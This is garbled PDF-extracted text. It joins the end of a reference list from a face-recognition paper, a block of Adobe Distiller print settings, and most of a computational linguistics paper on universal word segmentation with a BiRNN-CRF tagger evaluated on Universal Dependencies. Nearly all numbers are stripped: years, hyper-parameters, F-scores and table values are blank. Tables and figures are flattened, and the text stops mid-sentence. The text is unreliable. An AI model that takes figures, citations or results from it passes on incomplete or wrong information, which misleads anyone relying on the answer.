pattern recognition ( ): – doi . /s - ( ) - . zhang z, luo p, loy cc, tang x. b. joint face representation adaptation and clustering in videos. in: proceedings of the european conference on computer vision (eccv). amsterdam: springer, – . zhang z, song y, qi h. . age progression/regression by conditional adversarial autoencoder. in: proceedings of the ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee, – . zhang k, zhang z, li z, qiao y. a. joint face detection and alignment using multitask cascaded convolutional networks. ieee signal processing letters ( ): – doi . /lsp. . . zhu c, wen f, sun j. . a rank-order distance based clustering algorithm for face tagging. in: proceedings of the international conference on computer vision and pattern recognition (cvpr). colorado springs: ieee, – . zhu p, zhang l, zuo w, zhang d. . from point to set: extend the learning of distance metrics. in: proceedings of the international conference on computer vision (iccv). piscataway: ieee, – . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tifs. . https://patents.google.com/patent/ep a http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /lsp. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ efficient facial representations for age, gender and identity recognition in organizing photo albums using multi-output convnet introduction related works multi-output convnet for simultaneous age, gender, and identity recognition proposed pipeline for organizing photo and video albums experimental results conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice universal word segmentation: implementation and interpretation yan shao, christian hardmeier, joakim nivre department of linguistics and philology, uppsala university {yan.shao, christian.hardmeier, joakim.nivre}@lingfil.uu.se abstract word segmentation is a low-level nlp task that is non-trivial for a considerable number of languages. in this paper, we present a sequence tagging framework and apply it to word segmentation for a wide range of lan- guages with different writing systems and ty- pological characteristics. additionally, we in- vestigate the correlations between various ty- pological factors and word segmentation ac- curacy. the experimental results indicate that segmentation accuracy is positively related to word boundary markers and negatively to the number of unique non-segmental terms. based on the analysis, we design a small set of language-specific settings and extensively evaluate the segmentation system on the uni- versal dependencies datasets. our model ob- tains state-of-the-art accuracies on all the ud languages. it performs substantially better on languages that are non-trivial to segment, such as chinese, japanese, arabic and he- brew, when compared to previous work. introduction word segmentation is the initial step for most higher level natural language processing tasks, such as part-of-speech tagging (pos), parsing and machine translation. it can be regarded as the problem of correctly identifying word forms from a character string. word segmentation can be very challenging, es- pecially for languages without explicit word bound- ary delimiters, such as chinese, japanese and viet- namese. even for space-delimited languages like english or russian, relying on white space alone generally does not result in adequate segmentation as at least punctuation should usually be separated from the attached words. for some languages, the space-delimited units in the surface form are too coarse-grained and therefore often further analysed, as in the cases of arabic and hebrew. even though language-specific word segmentation systems are near-perfect for some languages, it is still useful to have a single system that performs reasonably with no or minimum language-specific adaptations. word segmentation standards vary substantially with different definitions of the concept of a word. in this paper, we will follow the teminologies of universal dependencies (ud), where words are de- fined as basic syntactic units that do not always coincide with phonological or orthographic words. some orthographic tokens, known in ud as mul- tiword tokens, therefore need to be broken into smaller units that cannot always be obtained by split- ting the input character sequence. to perform word segmentation in the ud frame- work, neither rule-based tokenisers that rely on white space nor the naive character-level sequence tagging model proposed previously (xue, ) are ideal. in this paper, we present an enriched sequence labelling model for universal word segmentation. it is capable of segmenting languages in very diverse written forms. furthermore, it simultaneously iden- tifies the multiword tokens defined by the ud frame- work that cannot be resolved simply by splitting note that this notion of multiword token has nothing to do with the notion of multiword expression (mwe) as discussed, for example, in sag et al. ( ). transactions of the association for computational linguistics, vol. , pp. – , . action editor: sebastian padó . submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. the input character sequence. we adapt a regular sequence tagging model, namely the bidirectional recurrent neural networks with conditional random fields (crf) (lafferty et al., ) interface as the fundamental framework (birnn-crf) (huang et al., ) for word segmentation. the main contributions of this work include: . we propose a sequence tagging model for word segmentation, both for general purposes (mere splitting) and full ud processing (splitting plus occasional transduction). . we investigate the correlation between segmen- tation accuracy and properties of languages and writing systems, which is helpful in interpret- ing the gaps between segmentation accuracies across different languages as well as selecting language-specific settings for the model. . our segmentation system achieves state-of-the- art accuracy on the ud datasets and improves on previous work (straka and straková, ) especially for the most challenging languages. . we provide an open source implementation. word segmentation in ud the ud scheme for cross-linguistically consistent morphosyntactic annotation defines words as syn- tactic units that have a unique part-of-speech tag and enter into syntactic relations with other words (nivre et al., ). for languages that use whitespace as boundary markers, there is often a mismatch be- tween orthographic words, called tokens in the ud terminology, and syntactic words. typical examples are clitics, like spanish dámelo = da me lo ( token, words), and contractions, like french du = de le ( token, words). tokens that need to split into multiple words are called multiword tokens and can be further subdivided into those that can be handled by simple segmentation, like english cannot = can not, and those that require a more complex transduc- tion, like french du = de le. we call the latter non- segmental multiword tokens. in addition to multi- word tokens, the ud scheme also allows multitoken words, that is, words consisting of multiple tokens, such as numerical expressions like . https://github.com/yanshao /segmenter word segmentation and typological factors we begin with the analysis of the difficulty of word segmentation. word segmentation is fundamen- tally more difficult for languages like chinese and japanese because there are no explicit word bound- ary markers in the surface form (xue, ). for vietnamese, the space-segmented units are syllables that roughly correspond to chinese characters rather than words. to characterise the challenges of word segmentation posed by different languages, we will examine several factors that vary depending on lan- guage and writing system. we will refer to these as typological factors although most of them are only indirectly related to the traditional notion of linguis- tic typology and depend more on writing system. • character set size (cs) is the number of unique characters, which is related to how in- formative the characters are to word segmen- tation. each character contains relatively more information if the character set size is larger. • lexicon size (ls) is the number of unique word forms in a dataset, which indicates how many unique word forms have to be identified by the segmentation system. lexicon size in- creases as the dataset grows in size. • average word length (al) is calculated by dividing the total character count by the word count. it is negatively correlated with the den- sity of word boundaries. if the average word length is smaller, there are more word bound- aries to be predicted. • segmentation frequency (sf) denotes how likely it is that space-delimited units are fur- ther segmented. it is calculated by dividing the word count by the space-segment count. lan- guages like chinese and japanese have much higher segmentation frequencies than space- delimited languages. • multiword token portion (mp) is the per- centage of multiword tokens that are non- segmental. • multiword token set size (ms) is the number of unique non-segmental multiword tokens. the last two factors are specific to the ud scheme but can have a significant impact on word segmenta- tion accuracy. figure : k-means clustering (k = ) of the ud languages. pca is applied for dimensionality reduction. cs ls al sf mp ms . . . - . - . - . table : pearson product-moment correlation coeffi- cients between dataset size and the statistical factors. all the languages in the ud dataset are charac- terised and grouped by the typological factors in fig- ure . we standardise the statistics x of the proposed factors on the ud datasets with the arithmetic mean µ and the standard deviation σ as x−µ σ . we use them as features and apply k-means clustering (k = ) to group the languages. principal component anal- ysis (pca) (abdi and williams, ) is used for dimensionality reduction and visualisation. the majority of the languages in ud are space- delimited with few or no multiword tokens and they are grouped at the bottom left of figure . they are statistically similar from the perspective of word segmentation. the semitic languages arabic and hebrew with rich non-segmental multiword tokens are positioned at the top. in addition, languages with large character sets and high segmentation fre- quencies, such as chinese, japanese and vietnamese are clustered together. korean is distanced from the other space-delimited languages as it contains white-space delimiters but has a comparatively large character set. overall, the x-axis of figure is pri- marily related to character set size and segmentation language cs ls al sf mp ms czech , . . . czech-cac , . . . czech-clit , . . . english , . . . english-lines , . . . english-partut , . . . finnish , . . . finnish-ftb , . . . french , . . . french-partut , . . . french-sequota , . . . latin , . . . latin-ittb , . . . portuguese , . . . portuguese-br , . . . russian , . . . russian-syntagrus , . . . slovenian , . . . slovenian-sst , . . . swedish , . . . swedish-lines , . . . table : different ud datasets in same languages and the statistical factors. frequency, while the y-axis is mostly associated with multiword tokens. dataset sizes for different languages in ud vary substantially. table shows the correlation coef- ficients between the dataset size in sentence num- ber and the six typological factors. apart from the lexicon size, all the other factors, including multi- word token set size, have no strong correlations with dataset size. from table , we can see that the char. on considère qu’environ allemands du wartheland ont péri pendant la période. tags bexbiiiiiiiexbiebiiiiiexbiiiiexbiiiiiiiexbexbiiiiiiiiexbiexbiiexbiiiiiexbexbiiiiies figure : tags employed for word segmentation. is a multitoken word, while qu’environ and du are multiword tokens that should be processed differently. factors, except for lexicon size, are relatively sta- ble across different ud treebanks for the same lan- guage, which indicates that they do capture proper- ties of these languages, although some variation in- evitably occurs due to corpus properties like genre. in this paper, we thoroughly investigate the corre- lations between the proposed statistical factors and segmentation accuracy. moreover, we aim to find specific settings that can be applied to improve seg- mentation accuracy for each language group. sequence tagging model word segmentation can be modelled as a character- level sequence labelling task (xue, ; chen et al., ). characters as basic input units are passed into a sequence labelling model and a sequence of tags that are associated with word boundaries are predicted. in this section, we introduce the boundary tags adopted in this paper. theoretically, binary classification is sufficient to indicate whether a character is the end of a word for segmentation. in practice, more fine-grained tagsets result in higher segmentation accuracy (zhao et al., ). following the work of shao et al. ( ), we employ a baseline tagset consisting of four tags: b, i, e, and s, to indicate a character positioned at the beginning (b), inside (i), or at the end (e) of a word, or occurring as a single-character word (s). the baseline tagset can be applied to word seg- mentation of chinese and japanese without further modification. for languages with space-delimiters, we add an extra tag x to mark the characters, mostly spaces, that do not belong to any words/tokens. as illustrated in figure , the regular spaces are marked with x while the space in a multitoken word like is disambiguated with i. to enable the model to simultaneously identify non-segmental multiword tokens for languages like spanish and arabic in the ud framework, we ex- tend the tagset by adding four tags b, i, e, s that correspond to b, i, e, s to mark corresponding tags applied languages baseline tags b, i, e, s chinese, japanese, ... boundary x russian, hindi, ... transduction b, i, e, s spanish, arabic, ... joint sent. seg. t, u all languages table : tag set for universal word segmentation. positions in non-segmental multiword tokens and to indicate their occurrences. as shown in figure , the multiword token qu’environ is split into qu’ and environ and therefore the corresponding tags are biebiiiiie. this contrasts with du, which should be transduced into de and le. moreover, the extra tags disambiguate whether the multiword to- kens should be split or transduced according to the context. for instance, aÜØð (wamimma) in arabic is occasionally split into ð (wa) and aÜØ (mimma) but more frequently transduced into ð (wa), áÓ (min) and aÓ (ma) . the corresponding tags are sbie and biie, respectively. the transduction of the identi- fied multiword tokens will be described in detail in the following section. the complete tagset is summarised in table . the proposed sequence model can easily be ex- tended to perform joint sentence segmentation by adding two more tags to mark the last character of a sentence (de lhoneux et al., ). t is used if the character is a single-character word and u otherwise. t and u can be used together with b, i, e, s, x for general segmentation, or with b, i, e, s additionally for full ud processing. joint sentence segmentation is not addressed any further in this paper. neural networks for segmentation . main network the main network for regular segmentation as well as non-segmental multiword token identification is an adaptation of the birnn-crf model (huang et al., ) (see figure ). the input characters can be represented as con- 夏 天 太 热 (too) (hot)(summer) character representations gru gru gru gru forward rnn gru gru gru gru backward rnn b e s s crf layer 太 热夏天output figure : the birnn-crf model for segmentation. the dashed arrows indicate that dropout is applied. ventional character embeddings. alternatively, we employ the concatenated -gram model introduced by shao et al. ( ). in this representation (fig- ure ), the pivot character in a given context is rep- resented as the concatenation of the character vec- tor representation along with the local bigram and trigram vectors. the concatenated n-grams encode rich local information as the same character has dif- ferent yet closely related vector representations in different contexts. for each n-gram order, we use a single vector to represent the terms that appear only once in the training set while training. these vectors are later used as the representations for unknown characters and n-grams in the development and test sets. all the embedding vectors are initialised ran- domly. the character vectors are passed to the forward and backward recurrent layers. gated recurrent units (gru) (cho et al., ) are employed as the basic recurrent cell to capture long term dependencies and sentence-level information. dropout (srivastava et al., ) is applied to both the inputs and the out- puts of the bidirectional recurrent layers. a first- order chain crf layer is added on top of the recur- 夏 天 太 热 (too) (hot)(summer) vi,i vi− ,i vi− ,i+ n-gram character representation v figure : concatenated -gram model. the third character is the pivot character in the given context. rent layers to incorporate transition information be- tween consecutive tags, which ensures that the op- timal sequence of tags over the entire sentence is obtained. the optimal sequence can be computed efficiently via the viterbi algorithm. . transduction the non-segmental multiword tokens identified by the main network are transduced into correspond- ing components in an additional step. based on the statistics of the multiword tokens to be trans- duced on the entire ud training sets, . % only have one possible transduction, which indicates that the main ambiguity of non-segmental multiword to- kens comes with identification, not transduction. we therefore transduce the identified non-segmental multiword tokens in a context-free fashion. for mul- tiword tokens with two or more valid transductions, we only adopt the most frequent one. in most languages that have multiword tokens, the number of unique non-segmental multiword to- kens is rather limited, such as in spanish, french and italian. for these languages, we build dictionar- ies from the training data to look up the multiword tokens. however, in some languages like arabic and hebrew, multiword tokens are very productive and therefore cannot be well covered by dictionar- ies generated from training data. some of the avail- able external dictionary resources with larger cover- age, for instance the mila lexicon (itai and wint- ner, ), do not follow the ud standards. in this paper, we propose a generalising ap- proach to processing non-segmental multiword to- kens. if there are more than unique multi- word tokens in the training set for a language, we character embedding size gru/lstm state size optimiser adagrad initial learning rate (main) . decay rate . gradient clipping . initial learning rate (encoder-decoder) . dropout rate . batch size table : hyper-parameters for segmentation. train an attention-based encoder-decoder (bahdanau et al., ) equipped with shared long-short term memory cells (lstm) (hochreiter and schmidhu- ber, ). at test time, identified non-segmental multiword tokens are first queried in the dictionary. if not found, the segmented components are gen- erated with the encoder-decoder as character-level transduction. overall, we utilise rich context to identify non-segmental multiword tokens, and then apply a combination of dictionary and sequence-to- sequence encoder-decoder to transduce them. . implementation our universal word segmenter is implemented us- ing the tensorflow library (abadi et al., ). sentences with similar lengths are grouped into the same bucket and padded to the same length. we construct sub-computational graphs for each bucket so that sentences of different lengths are processed more efficiently. table shows the hyper-parameters adopted for the neural networks. we use one set of parame- ters for all the experiments as we aim for a sim- ple universal model, although fine-tuning the hyper- parameters on individual languages might result in additional improvements. the encoder-decoder is trained prior to the main network. the weights of the neural networks, including the embeddings, are initialised using the scheme introduced in glo- rot and bengio ( ). the network is trained us- ing back-propagation. all the random embeddings are fine-tuned during training by back-propagating gradients. adagrad (duchi et al., ) with mini- batches is employed for optimization. the initial learning rate η is updated with a decay rate ρ. the encoder-decoder is trained with the unique non-segmental multiword tokens extracted from the training set. % of the total instances are subtracted for validation. the model is trained for epochs and the score of how many outputs exactly match the references is used for selecting the weights. for the main network, word-level f -score is used to measure the performance of the model after each epoch on the development set. the network is trained for epochs and the weight of the best epoch is selected. to increase efficiency and reduce memory de- mand both for training and decoding, we truncate sentences longer than characters. at decoding time, the truncated sentences are reassembled at the recorded cut-off points in a post-processing step. experiments . datasets and evaluation datasets from universal dependencies . (nivre et al., ) are used for all the word segmentation ex- periments. in total, there are datasets in lan- guages that vary substantially in size. the training sets are available in languages. we follow the standard splits of the datasets. if no development set is available, % of the training set is subtracted. we adopt word-level precision, recall and f - score as the evaluation metrics. the candidate and the reference word sequences in our experiments may not share the same underlying characters due to the transduction of non-segmental multiword to- kens. the alignment between the candidate words and the references becomes unclear and therefore it is difficult to compute the associated scores. to re- solve this issue, we use the longest common subse- quence algorithm to align the candidate and the ref- erence words. the matched words are compared and the evaluation scores are computed accordingly: r = |c∩r| |r| ( ) p = |c∩r| |c| ( ) f = · r ·p r + p ( ) where c and r denote the sequences of candidate words and reference words, and |c|, |r| are their we employ the version that was used in the conll shared task on ud parsing. basic unit f -score training time (s) latin character . space-delimited unit . table : different segmentation units employed for word segmentation on vietnamese. concatenated - gram is not used. lengths. |c∩r| is the number of candidate words that are aligned to reference words by the longest com- mon subsequence algorithm. the word-level evalu- ation metrics adopted in this paper are different from the boundary-based alternatives (palmer and burger, ). we adapt the evaluation script from the conll shared task (zeman et al., ) to calculate the scores. in the following experiments, we only report the f -score. in the following sections, we thoroughly investi- gate correlations between several language-specific characteristics and segmentation accuracy. all the experimental results in section . are obtained on the development sets. the test sets are reserved for final evaluation, reported in section . . . language-specific characteristics . . word-internal spaces for vietnamese and other languages with sim- ilar historical backgrounds, such as zhuang and hmongic languages (zhou, ), the space- delimited syllables containing no punctuation are never segmented but joined into words with word- internal spaces instead. the space-delimited units can therefore be applied as the basic elements for tag prediction if we pre-split punctuation. word seg- mentation for these languages thus becomes practi- cally the same as for chinese and japanese. table shows that a substantial improvement can be achieved if we use space-delimited syllables as the basic elements for word segmentation for viet- namese. it also drastically increases both training and decoding speed as the sequence of tags to be predicted becomes much shorter. . . character representation we apply regular character embeddings and con- catenated -gram vectors introduced in section . to the input characters and test their performances . . n/ f - s co re arabic catalan chinese english japanese spanish figure : segmentation results with unigram char- acter embeddings (dashed) and concatenated -gram vectors for character representations with different numbers of training instances n. respectively. first, the experiments are extensively conducted on all the languages with the full train- ing sets. the results show that the concatenated -gram model is substantially better than the regu- lar character embeddings on chinese, japanese and vietnamese, but notably worse on spanish and cata- lan. for all the other languages, the differences are marginal. to gain more insights, we select six languages, namely arabic, catalan, chinese, japanese, english and spanish for more detailed analysis via learn- ing curve experiments. the training sets are grad- ually extended by sentences at a time. the results are shown in figure . regardless of the amounts of training data and the other typological factors, concatenated -grams are better on chinese and japanese and worse on spanish and catalan. we expect the concatenated -gram representation to outperform simple character embeddings on all languages with a large character set but no space de- limiters. since adopting the concatenated -gram model drastically enlarges the embedding space, in the following experiments, including the final testing phase, concatenated -grams are only applied to chinese, japanese and vietnamese. . . . . n/ f - s co re arabic chinese english korean russian spanish figure : segmentation results with (dashed) and without space delimiters with different numbers of training instances n. . . space delimiters chinese and japanese are not delimited by spaces. additionally, continuous writing without spaces (scriptio continua) is evidenced in most classical greek and latin manuscripts. we perform two sets of learning curve experiments to investigate the im- pact of white space on word segmentation. in the first set, we keep the datasets in their original forms. in the second set, we omit all white space. the ex- perimental results are presented in figure . in general, there are huge discrepancies between the accuracies with and without spaces, showing that white space acts crucially as a word boundary in- dicator. retaining the original forms of the space- delimited languages, very high accuracies can be achieved even with small amounts of training data as the model quickly learns that space is a reliable word boundary indicator. moreover, we obtain rel- atively lower scores on space-delimited languages when space is ignored than chinese using compara- ble amounts of training data, which shows that chi- nese characters are more informative to word bound- ary prediction, due to the large character set size. . . non-segmental multiword tokens the concept of multiword tokens is specific to ud. to explore how the non-segmental multiword tokens, as opposed to pure segmentation, influence . . n/ f - s co re arabic french hebrew italian portuguese spanish figure : segmentation results with and without (dashed) processing non-segmental multiword to- kens with different training instances n. language data size evaluation scores training validation acc mfs arabic , . . hebrew , . . table : accuracy of the seq seq transducer on ara- bic and hebrew. segmentation accuracy, we conduct relevant experi- ments on selected languages. similarly to the previ- ous section, two sets of learning curve experiments are performed. in the second set, all the multiword tokens that require transduction are regarded as sin- gle words without being processed. the results are presented in figure . word segmentation with full ud processing is no- tably more challenging for arabic and hebrew. ta- ble shows the evaluation of the encoder-decoder as the transducer for non-segmental multiword tokens on arabic and hebrew. the evaluation metrics acc and mf-score (mfs) are adapted from the metrics used for machine transliteration evaluation (li et al., ). acc is exact match and mfs is based on edit distance. the transducer yields relatively higher scores on hebrew while it is more challenging to process arabic. in addition, different approaches to transducing the non-segmental multiword tokens are evaluated in table . in the condition none, the identified non- none dictionary transducer mix arabic . . . . hebrew . . . . table : segmentation accuracies on arabic and hebrew with different ways of transducing non- segmental multiword tokens. segmental multiword tokens remain unprocessed. in dictionary, they are mapped via the dictionary de- rived from training data if found in the dictionary. in transducer, they are all transduced by the attention- based encoder-decoder. in mix, in addition to utilis- ing the mapping dictionary, the non-segmental terms not found in the dictionary are transduced with the encoder-decoder. the results show that when the encoder-decoder is applied alone, it is worse than only using the dictionaries, but additional improve- ments can be obtained by combining both of them. the accuracy differences associated with non- segmental multiword tokens are nonetheless marginal on the other languages as shown in figure . regardless of their frequent occurrences, mul- tiword tokens are easy to process in general when the set of unique non-segmental multiword tokens is small. . . correlations with accuracy we investigate the correlations between the pro- posed typological factors in section and segmen- tation accuracy using linear regression with huber loss (huber, ). the factors are used in addition to training set size as the features to predict the seg- mentation accuracies in f -score. to collect more data samples, apart from experimenting with the full training data for each set, we also use smaller sets of , , and , training instances to train the models respectively if the training set is large enough. the features are standardised with the arith- metic mean and the standard deviation before fitting the linear regression model. the correlation coefficients of the linear regres- sion model are presented in figure . we can see that segmentation frequency and multiword token set size are negatively correlated with segmentation accuracy. overall, the ud datasets are strongly bi- ased towards space-delimited languages. training set size is therefore not a strong factor as high accu- ts cs ls al sf mp ms − · − figure : correlation coefficients between segmen- tation accuracy and the typological factors in the lin- ear regression model. the factors are training set size (ts), character set size (cs), lexicon size (ls), average word length (al), segmentation frequency (sf), multitoken word portion (mp) and multitoken word size (ms). racies can be obtained with small amounts of train- ing data, which is consistent with the results of all the learning curve experiments. the other typolog- ical factors such as average word length and lexi- con size are less relevant to segmentation accuracy. referring back to figure , segmentation frequency and multiword token set size as the most influen- tial factors, are also the primary principal compo- nents that categorise the ud languages into different groups. . . language-specific settings our model obtains competitive results with only a minimal number of straightforward language- specific settings. based on the previous analysis of segmentation accuracy and typological factors, re- ferring back to figure , we apply the following settings, targeting on specific language groups, to the segmentation system on the final test sets. the language-specific settings can be applied to new lan- guages beyond the ud datasets based on an analysis of the typological factors. . for languages with word-internal spaces like vietnamese, we first separate punctuation and then use space-delimited syllables for bound- space nltk udpipe this paper . . . . table : average evaluation scores on ud lan- guages, excluding chinese, japanese, vietnamese, arabic and hebrew. ary prediction. . for languages with large character sets and no space delimiters, like chinese and japanese, we use concatenated -gram representations. . for languages with more than unique non- segmental multiword tokens, like arabic and hebrew, we use the encoder-decoder model for transduction. . for other languages, the universal model is suf- ficient without any specific adaptation. . final results we compare our segmentation model to udpipe (straka and straková, ) on the test sets. udpipe contains word segmentation, pos tagging, morpho- logical analysis and dependency parsing models in a pipeline. the word segmentation model in ud- pipe is also based on rnn with gru. for efficiency, udpipe has a smaller character embedding size and no crf interface. it also relies heavily on white- space and uses specific configurations for languages in which word-internal spaces are allowed. auto- matically generated suffix rules are applied jointly with a dictionary query to handle multiword tokens. moreover, udpipe uses language-specific hyper- parameters for chinese and japanese. we employ udpipe . with the publicly avail- able ud . models. the presegmented option is enabled as we assume the input text to be preseg- mented into sentences so that only word segmen- tation is evaluated. in addition, the conll shared task involved some test sets for which no specific training data were available. this included a number of parallel test sets of known languages, for which we apply the models trained on the standard tree- banks, as well as four surprise languages, namely buryat, kurmanji, north sami and upper sorbian, for which we use the small annotated data samples provided in addition to the test sets by the shared http://hdl.handle.net/ / - task to build models and evaluation on those lan- guages. the main evaluation results are shown in table . we also report the macro average f -scores. the scores of the surprise languages are excluded and presented separately as no corresponding udpipe models are available. our system obtains higher segmentation accuracy overall. it achieves substantially better accuracies on languages that are challenging to segment, namely chinese, japanese, vietnamese, arabic and hebrew. the two systems yield very similar scores, when these languages are excluded as shown in table , in which the two systems are also compared with two rule-based baselines, a simple space-based to- keniser and the tokenisation model for english in nltk (loper and bird, ). the nltk model obtains relatively high accuracy while the space- based baseline substantially underperforms, which indicates that relying on white space alone is insuffi- cient for word segmentation in general. on the ma- jority of the space-delimited languages without pro- ductive non-segmental multiword tokens, both ud- pipe and our segmentation system yield near-perfect scores in table . in general, referring back to fig- ure , languages that are clustered at the bottom-left corner are relatively trivial to segment. the evaluation scores are notably lower on semitic languages as well as languages without word delimiters. nonetheless, our system obtains substantially higher scores on the languages that are more challenging to process. for chinese, japanese and vietnamese, our sys- tem benefits substantially from the concatenated -gram character representation, which has been demonstrated in section . . . besides, we em- ploy a more fine-grained tagset with crf loss in- stead of the binary tags adopted in udpipe. as presented in zhao et al. ( ), more fine-grained tagging schemes outperform binary tags, which is supported by the experimental results on morpheme segmentation reported in ruokolainen et al. ( ). we further investigate the merits of the fine- grained tags over the binary tags as well as the ef- fectiveness of the crf interface by the experiments presented in table with the variances of our seg- mentation system. the fine-grained tags denote the boundary tags introduced in table . the binary dataset udpipe this paper dataset udpipe this paper dataset udpipe this paper ancient greek . . ancient greek-proiel . . arabic . . arabic-pud . . basque . . bulgarian . . catalan . . chinese . . croatian . . czech . . czech-cac . . czech-cltt . . czech-pud . . danish . . dutch . . dutch-lassysmall . . english . . english-lines . . english-pud . . english-partut . . estonian . . finnish . . finnish-ftb . . finnish-pud . . french . . french-pud . . french-partut . . french-sequoia . . galician . . galician-treegal . . german . . german-pud . . gothic . . greek . . hebrew . . hindi . . hindi-pud . . hungarian . . indonesian . . irish . . italian . . italian-pud . . japanese . . japanese-pud . . kazakh . . korean . . latin . . latin-ittb . . latin-proiel . . latvian . . norwegian-bokmaal . . norwegian-nynorsk . . old church slavonic . . persian . . polish . . portuguese . . portuguese-br . . portuguese-pud . . romanian . . russian . . russian-pud . . russian-syntagrus . . slovak . . slovenian . . slovenian-sst . . spanish . . spanish-ancora . . spanish-pud . . swedish . . swedish-lines . . swedish-pud . . turkish . . turkish-pud . . ukrainian . . urdu . . uyghur . . vietnamese . . average . . table : evaluation results on the ud test sets in f -scores. the datasets are represented in the correspond- ing treebank codes. pud suffix indicates the parallel test data. two shades 